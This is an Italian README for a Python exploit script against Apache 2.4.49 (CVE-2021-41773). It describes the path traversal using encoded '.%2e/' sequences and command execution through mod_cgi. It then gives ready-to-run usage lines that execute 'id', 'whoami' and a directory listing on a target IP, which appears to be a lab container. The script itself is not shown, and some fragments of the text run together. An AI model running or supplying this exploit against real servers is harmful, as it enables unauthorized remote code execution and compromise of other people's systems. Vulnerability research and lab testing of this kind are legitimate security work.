
Exploit Python per il path traversal e RCE di Apache 2.4.49 (CVE-2021-41773) che invia richieste appositamente predisposte per eseguire comandi arbitrari su server vulnerabili.
Questa vulnerabilità colpisce le versioni di Apache HTTP Server 2.4.49. Un errore nella validazione del path consente ad attaccanti remoti di effettuare un Path Traversal utilizzando sequenze come .%2e/ per accedere a percorsi al di fuori della directory root configurata.
Quando il modulo mod_cgi è abilitato, un attaccante può eseguire comandi arbitrari inviando richieste appositamente predisposte a un file CGI. Ciò consente esecuzione remota di codice (RCE).
mod_cgi abilitatoQuesto script permette di sfruttare la vulnerabilità inviando comandi remoti al server interessato.
curl installatopython3 exploit.py -i <IP_DEL_SERVIDOR> -c <COMANDO>
python3 exploit.py -i 172.17.0.2 -c "id"
python3 exploit.py -i 172.17.0.2 -c "whoami"
python3 exploit.py -i 172.17.0.2 -c "cd ../../../ && ls -la"